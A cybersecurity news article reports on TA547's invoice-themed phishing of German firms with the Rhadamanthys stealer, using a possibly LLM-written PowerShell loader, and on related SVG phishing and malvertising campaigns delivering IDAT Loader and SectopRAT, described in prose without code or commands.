Threat actors tracked as TA547 As part of an invoice-themed phishing campaign, dozens of German organizations were targeted using an information-stealing program called Rhadamanthys.
“This is the first time researchers have observed TA547 using Rhadamanthys, an information-stealing program used by multiple cybercriminal threat actors,” Proofpoint said. “In addition, the actor appears to have used a PowerShell script, which researchers suspect is generated by a large language model (LLM).”
TA547 is a prolific, financially motivated threat actor known to have been active since at least November 2017, using email phishing lures to deliver various Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif , and even Adhubllka ransomware.
In recent years, the group has evolved into an initial access broker (IAB) for ransomware attacks. Geofencing techniques have also been observed employing to restrict payloads to specific areas.
The emails observed in the latest campaign impersonate the German company Metro AG and contain a password-protected ZIP file containing a ZIP archive that, when opened, initiates the execution of a remote PowerShell script, launching Rhadamanthys exfiltration directly in memory. program.
Interestingly, the PowerShell script used to load Rhadamanthys includes “grammatically correct and hyper-specific annotations” for each instruction in the program, raising the possibility that it may have been generated (or rewritten) using LLM.
Another hypothesis is that TA547 copied the script from another source using generative artificial intelligence technology to create the script.
“This campaign represents an example of some of TA547’s technical shifts, including the use of compressed LNK and the previously unobserved Rhadamanthys stealer,” Proofpoint said. “It also provides insights into how threat actors are exploiting malware campaigns that may be caused by Insights from LLM-generated content.”
This development comes as phishing campaigns have also been leveraging uncommon tactics to facilitate credential theft attacks. In these emails, recipients receive a voice message notification and are directed to click on a link to access it.
The payload retrieved from the URL is heavily obfuscated HTML content that executes JavaScript code embedded in the SVG image when the page is rendered on the target system.
Binary Defense said the SVG data contained “encrypted data containing a second-stage page that prompts the target to enter credentials to access the voice message,” adding that the page was encrypted using CryptoJS.
Other email-based attacks have paved the way for Agent Tesla, which, according to Cofense, has become an attractive option for threat actors because it “is an affordable malware service with a variety of penetration capabilities.” and the ability to steal user information.”
Social engineering campaigns also take the form of malvertising on search engines such as Google, luring unsuspecting users into downloading fake installers of popular software such as PuTTY, FileZilla and Room Planner, and ultimately deploying Nitrogen and IDAT Loader.
The infection chain related to IDAT Loader is noteworthy because the MSIX installer is used to launch a PowerShell script, which in turn contacts the Telegram bot to obtain a second PowerShell script hosted on the bot.
This PowerShell script then acts as a conduit to another PowerShell script that is used to bypass Windows Anti-Malware Scanning Interface (AMSI) protection and trigger the execution of a loader that then proceeds to load the SectopRAT Trojan.
“Restricting traffic from major and lesser-known ad networks through group policies protects endpoints from malvertising,” said Jérôme Segura, principal threat researcher at Malwarebytes.
